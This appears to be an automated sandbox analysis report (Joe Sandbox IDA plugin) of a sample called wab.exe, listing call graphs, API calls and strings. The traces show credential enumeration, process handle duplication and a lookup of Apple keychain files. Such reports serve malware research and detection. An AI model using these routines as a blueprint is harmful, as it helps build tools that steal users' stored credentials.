40271->40273 40275 416760 11 API calls 40272->40275 40277 417055 40272->40277 40274 417075 40273->40274 40276 41707a 11 API calls 40273->40276 40274->40198 40275->40277 40276->40272 40277->40198 40278->40230 40279->40203 40280->40203 40281->40203 40282->40203 40283->40203 40284->40221 40285->40205 40286->40208 40287->40211 40288->40219 40289->40229 40293 42b4ff 40290->40293 40291 415a91 memset 40292 42b52c 40291->40292 40294 42b553 memcpy 40292->40294 40295 42b545 40292->40295 40293->40291 40294->40295 40295->40117 40296->40119 40297->40120 40303 415cfe 40298->40303 40307 415d23 __aullrem __aulldvrm 40303->40307 40310 41628e 40303->40310 40304 4163ca 40317 416422 11 API calls 40304->40317 40306 416172 memset 40306->40307 40307->40304 40307->40306 40308 416422 10 API calls 40307->40308 40309 415cb9 10 API calls 40307->40309 40307->40310 40308->40307 40309->40307 40311 416520 40310->40311 40312 416527 40311->40312 40316 416574 40311->40316 40313 416544 40312->40313 40312->40316 40318 4156aa 11 API calls 40312->40318 40315 416561 memcpy 40313->40315 40313->40316 40315->40316 40316->40096 40317->40310 40318->40313 40350 41493c EnumResourceNamesW 37676 4287c1 37677 4287d2 37676->37677 37678 429ac1 37676->37678 37679 428818 37677->37679 37680 42881f 37677->37680 37695 425711 37677->37695 37690 425ad6 37678->37690 37746 415c56 11 API calls 37678->37746 37713 42013a 37679->37713 37741 420244 97 API calls 37680->37741 37685 4260dd 37740 424251 120 API calls 37685->37740 37687 4259da 37739 416760 11 API calls 37687->37739 37693 422aeb memset memcpy memcpy 37693->37695 37694 429a4d 37696 429a66 37694->37696 37700 429a9b 37694->37700 37695->37678 37695->37687 37695->37693 37695->37694 37698 4260a1 37695->37698 37709 4259c2 37695->37709 37712 425a38 37695->37712 37729 4227f0 memset memcpy 37695->37729 37730 422b84 15 API calls 37695->37730 37731 422b5d memset memcpy memcpy 37695->37731 37732 422640 13 API calls 37695->37732 37734 4241fc 11 API calls 37695->37734 37735 42413a 90 API calls 37695->37735 37742 415c56 11 API calls 37696->37742 37738 415c56 11 API calls 37698->37738 37701 429a96 37700->37701 37744 416760 11 API calls 37700->37744 37745 424251 120 API calls 37701->37745 37704 429a7a 37743 416760 11 API calls 37704->37743 37709->37690 37733 415c56 11 API calls 37709->37733 37712->37709 37736 422640 13 API calls 37712->37736 37737 4226e0 12 API calls 37712->37737 37714 42014c 37713->37714 37717 420151 37713->37717 37756 41e466 97 API calls 37714->37756 37716 420162 37716->37695 37717->37716 37718 4201b3 37717->37718 37719 420229 37717->37719 37720 4201b8 37718->37720 37721 4201dc 37718->37721 37719->37716 37722 41fd5e 86 API calls 37719->37722 37747 41fbdb 37720->37747 37721->37716 37725 4201ff 37721->37725 37753 41fc4c 37721->37753 37722->37716 37725->37716 37728 42013a 97 API calls 37725->37728 37728->37716 37729->37695 37730->37695 37731->37695 37732->37695 37733->37687 37734->37695 37735->37695 37736->37712 37737->37712 37738->37687 37739->37685 37740->37690 37741->37695 37742->37704 37743->37701 37744->37701 37745->37678 37746->37687 37748 41fbf1 37747->37748 37749 41fbf8 37747->37749 37752 41fc39 37748->37752 37771 4446ce 11 API calls 37748->37771 37761 41ee26 37749->37761 37752->37716 37757 41fd5e 37752->37757 37754 41ee6b 86 API calls 37753->37754 37755 41fc5d 37754->37755 37755->37721 37756->37717 37759 41fd65 37757->37759 37758 41fdab 37758->37716 37759->37758 37760 41fbdb 86 API calls 37759->37760 37760->37759 37762 41ee41 37761->37762 37763 41ee32 37761->37763 37772 41edad 37762->37772 37775 4446ce 11 API calls 37763->37775 37766 41ee3c 37766->37748 37769 41ee58 37769->37766 37777 41ee6b 37769->37777 37771->37752 37781 41be52 37772->37781 37775->37766 37776 41eb85 11 API calls 37776->37769 37778 41ee70 37777->37778 37779 41ee78 37777->37779 37834 41bf99 86 API calls 37778->37834 37779->37766 37782 41be6f 37781->37782 37783 41be5f 37781->37783 37789 41be8c 37782->37789 37813 418c63 memset memset 37782->37813 37812 4446ce 11 API calls 37783->37812 37786 41be69 37786->37766 37786->37776 37787 41bee7 37787->37786 37817 41a453 86 API calls 37787->37817 37789->37786 37789->37787 37790 41bf3a 37789->37790 37791 41bed1 37789->37791 37816 4446ce 11 API calls 37790->37816 37793 41bef0 37791->37793 37796 41bee2 37791->37796 37793->37787 37795 41bf01 37793->37795 37794 41bf24 memset 37794->37786 37795->37794 37797 41bf14 37795->37797 37814 418a6d memset memcpy memset 37795->37814 37802 41ac13 37796->37802 37815 41a223 memset memcpy memset 37797->37815 37801 41bf20 37801->37794 37803 41ac3f memset 37802->37803 37805 41ac52 37802->37805 37804 41acd9 37803->37804 37804->37787 37807 41ac6a 37805->37807 37818 41dc14 19 API calls 37805->37818 37809 41aca1 37807->37809 37819 41519d 37807->37819 37809->37804 37810 41acc0 memset 37809->37810 37811 41accd memcpy 37809->37811 37810->37804 37811->37804 37812->37786 37813->37789 37814->37797 37815->37801 37816->37787 37818->37807 37822 4175ed 37819->37822 37830 417570 SetFilePointer 37822->37830 37825 41760a ReadFile 37826 417637 37825->37826 37827 417627 GetLastError 37825->37827 37828 4151b3 37826->37828 37829 41763e memset 37826->37829 37827->37828 37828->37809 37829->37828 37831 4175b2 37830->37831 37832 41759c GetLastError 37830->37832 37831->37825 37831->37828 37832->37831 37833 4175a8 GetLastError 37832->37833 37833->37831 37834->37779 37835 417bc5 37836 417c61 37835->37836 37841 417bda 37835->37841 37837 417bf6 UnmapViewOfFile CloseHandle 37837->37837 37837->37841 37839 417c2c 37839->37841 37847 41851e 20 API calls 37839->37847 37841->37836 37841->37837 37841->37839 37842 4175b7 37841->37842 37843 4175d6 FindCloseChangeNotification 37842->37843 37844 4175c8 37843->37844 37845 4175df 37843->37845 37844->37845 37846 4175ce Sleep 37844->37846 37845->37841 37846->37843 37847->37839 39784 4147f3 39787 414561 39784->39787 39786 414813 39788 41456d 39787->39788 39789 41457f GetPrivateProfileIntW 39787->39789 39792 4143f1 memset _itow WritePrivateProfileStringW 39788->39792 39789->39786 39791 41457a 39791->39786 39792->39791

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                            APIs
                                                            • memset.MSVCRT ref: 0040DDAD
                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                            • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                            • memset.MSVCRT ref: 0040DF5F
                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                            • API String ID: 594330280-3398334509
                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 ??3@YAXPAX@Z 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 600 413e6a-413e76 596->600 597->596 602 413e46-413e5c GetProcAddress 597->602 598->599 599->580 600->592 602->596 604->583
                                                            APIs
                                                              • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                            • memset.MSVCRT ref: 00413D7F
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                            • memset.MSVCRT ref: 00413E07
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                            • API String ID: 912665193-1740548384
                                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                            • memcpy.MSVCRT ref: 0040B60D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                            • String ID: BIN
                                                            • API String ID: 1668488027-1015027815
                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FileFind$FirstNext
                                                            • String ID:
                                                            • API String ID: 1690352074-0
                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0041898C
                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: InfoSystemmemset
                                                            • String ID:
                                                            • API String ID: 3558857096-0
                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                            APIs
                                                            • memset.MSVCRT ref: 004455C2
                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                            • memset.MSVCRT ref: 0044570D
                                                            • memset.MSVCRT ref: 00445725
                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                              • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                              • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                            • memset.MSVCRT ref: 0044573D
                                                            • memset.MSVCRT ref: 00445755
                                                            • memset.MSVCRT ref: 004458CB
                                                            • memset.MSVCRT ref: 004458E3
                                                            • memset.MSVCRT ref: 0044596E
                                                            • memset.MSVCRT ref: 00445A10
                                                            • memset.MSVCRT ref: 00445A28
                                                            • memset.MSVCRT ref: 00445AC6
                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                            • memset.MSVCRT ref: 00445B52
                                                            • memset.MSVCRT ref: 00445B6A
                                                            • memset.MSVCRT ref: 00445C9B
                                                            • memset.MSVCRT ref: 00445CB3
                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                            • memset.MSVCRT ref: 00445B82
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                            • memset.MSVCRT ref: 00445986
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                            • API String ID: 2745753283-3798722523
                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                            • String ID: $/deleteregkey$/savelangfile
                                                            • API String ID: 2744995895-28296030
                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 0040B71C
                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                            • memset.MSVCRT ref: 0040B756
                                                            • memset.MSVCRT ref: 0040B7F5
                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                            • memset.MSVCRT ref: 0040B851
                                                            • memset.MSVCRT ref: 0040B8CA
                                                            • memcmp.MSVCRT ref: 0040B9BF
                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                            • memset.MSVCRT ref: 0040BB53
                                                            • memcpy.MSVCRT ref: 0040BB66
